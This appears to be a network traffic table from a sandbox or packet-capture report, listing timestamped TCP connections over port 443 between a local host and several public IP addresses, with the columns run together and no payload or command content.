                                                                                                                                              Nov 6, 2024 16:55:46.740976095 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:46.741102934 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:46.741120100 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:46.741348028 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:46.741359949 CET44349797188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.343326092 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.343646049 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:47.343674898 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.344093084 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.344399929 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:47.344463110 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.344522953 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:47.383057117 CET44349797188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.383368015 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.383382082 CET44349797188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.384416103 CET44349797188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.384501934 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.384860039 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.384880066 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.384938955 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.384954929 CET44349797188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.385030985 CET49797443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.385231972 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.385278940 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.385366917 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.385853052 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.385868073 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.391330957 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.487163067 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.487241030 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.487288952 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:47.487847090 CET49796443192.168.2.18104.18.95.41
                                                                                                                                              Nov 6, 2024 16:55:47.487867117 CET44349796104.18.95.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.995351076 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.995758057 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.995771885 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.996107101 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.996485949 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.996551037 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.996778011 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.996778011 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:47.996793032 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:47.996807098 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.453182936 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.453346014 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.453428984 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.454530001 CET49798443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.454554081 CET44349798188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.465322018 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.465356112 CET44349799188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.465440989 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.465477943 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.465513945 CET44349800188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.465576887 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.465895891 CET49801443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:52.465924978 CET44349801151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.466063976 CET49801443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:52.466305017 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:52.466340065 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.466393948 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:52.466705084 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.466721058 CET44349799188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.466950893 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:52.466979980 CET44349800188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.467132092 CET49801443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:52.467159033 CET44349801151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.467349052 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:52.467365980 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.469341040 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:52.469369888 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.469470978 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:52.469762087 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:52.469779015 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.502403021 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:52.502435923 CET44349804188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:52.502515078 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:52.502778053 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:52.502790928 CET44349804188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.065840006 CET44349799188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.066234112 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.066251993 CET44349799188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.067352057 CET44349799188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.067435980 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.067828894 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.067850113 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.067905903 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.067955971 CET44349799188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.068022966 CET49799443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.068414927 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.068448067 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.068527937 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.068799973 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.068808079 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.073157072 CET44349801151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.073402882 CET49801443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:53.073415041 CET44349801151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.073770046 CET44349801151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.074071884 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.074099064 CET49801443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:53.074163914 CET44349801151.101.2.137192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.074243069 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:53.074259996 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.074620008 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.074887991 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:53.074955940 CET44349802104.17.25.14192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.082750082 CET44349800188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.082962036 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.082981110 CET44349800188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.084043026 CET44349800188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.084115982 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.084353924 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.084368944 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.084400892 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.084415913 CET44349800188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.084474087 CET49800443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.084654093 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.084693909 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.084765911 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.085083008 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:53.085097075 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.107167959 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.107409000 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:53.107428074 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.107775927 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.108069897 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:53.108134031 CET44349803104.18.94.41192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.118571997 CET44349804188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.118803024 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.118819952 CET44349804188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.119040966 CET49802443192.168.2.18104.17.25.14
                                                                                                                                              Nov 6, 2024 16:55:53.119045019 CET49801443192.168.2.18151.101.2.137
                                                                                                                                              Nov 6, 2024 16:55:53.119841099 CET44349804188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.119910002 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120198011 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120198011 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120261908 CET44349804188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.120290041 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120318890 CET49804443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120481968 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120511055 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.120587111 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120847940 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:53.120861053 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:53.151098013 CET49803443192.168.2.18104.18.94.41
                                                                                                                                              Nov 6, 2024 16:55:54.686454058 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.686813116 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.686881065 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:54.686896086 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.686903954 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.687072039 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.687078953 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.687201023 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.687208891 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.687968969 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.688047886 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:54.688186884 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.688254118 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.688308001 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.688378096 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.688424110 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:54.688498974 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.689088106 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.689188004 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.691230059 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.691351891 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.691611052 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:54.691623926 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.691745996 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.691752911 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.737052917 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.737063885 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:54.737282038 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:54.737301111 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:54.785168886 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.187890053 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.187972069 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188002110 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188039064 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.188059092 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188110113 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.188200951 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188251972 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188291073 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188292980 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.188301086 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188330889 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.188731909 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188855886 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.188910961 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.189265013 CET49806443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.189281940 CET44349806188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.212274075 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.212356091 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.212423086 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:55.213030100 CET49807443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:55.213047028 CET44349807188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.217885017 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.217920065 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.217946053 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.263338089 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.711679935 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.711812973 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.711855888 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.712656975 CET49805443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.712677002 CET44349805188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.715291023 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:55.715334892 CET44349808188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.715409994 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:55.715706110 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:55.715722084 CET44349808188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.813477039 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.813533068 CET44349809188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:55.813611984 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.814219952 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:55.814239025 CET44349809188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.335967064 CET44349808188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.336230993 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.336251020 CET44349808188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.337296009 CET44349808188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.337364912 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.337655067 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.337667942 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.337713957 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.337714911 CET44349808188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.337814093 CET49808443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.337999105 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.338030100 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.338109016 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.338359118 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.338371992 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.429838896 CET44349809188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.430136919 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.430170059 CET44349809188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.431235075 CET44349809188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.431302071 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.431596994 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.431612968 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.431664944 CET44349809188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.431691885 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.431734085 CET49809443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.431992054 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.432029963 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.432106018 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.432301044 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:56.432312965 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.954539061 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.954981089 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.955005884 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.955390930 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.955776930 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:56.955858946 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:56.955985069 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:57.003341913 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.067785025 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.071137905 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.071166039 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.071537971 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.075298071 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.075366974 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.075532913 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.119323969 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.461981058 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.462060928 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.462766886 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:57.463110924 CET49810443192.168.2.18188.114.96.3
                                                                                                                                              Nov 6, 2024 16:55:57.463129044 CET44349810188.114.96.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.603770018 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.603864908 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.604017019 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.604135036 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.604135036 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.604160070 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.604218960 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.604223967 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.604264021 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.720426083 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.720506907 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.720585108 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.720644951 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.720666885 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.720845938 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.720892906 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.720899105 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.720933914 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.721220970 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.721292973 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.721338987 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.721343994 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.721750975 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.721782923 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.721793890 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.721797943 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.721831083 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.721836090 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.722582102 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.722619057 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.722626925 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.722630978 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.722666979 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.722670078 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.723402023 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.723438978 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.723472118 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.723484039 CET49811443192.168.2.18188.114.97.3
                                                                                                                                              Nov 6, 2024 16:55:57.723489046 CET44349811188.114.97.3192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:57.723520041 CET49811443192.168.2.18188.114.97.3
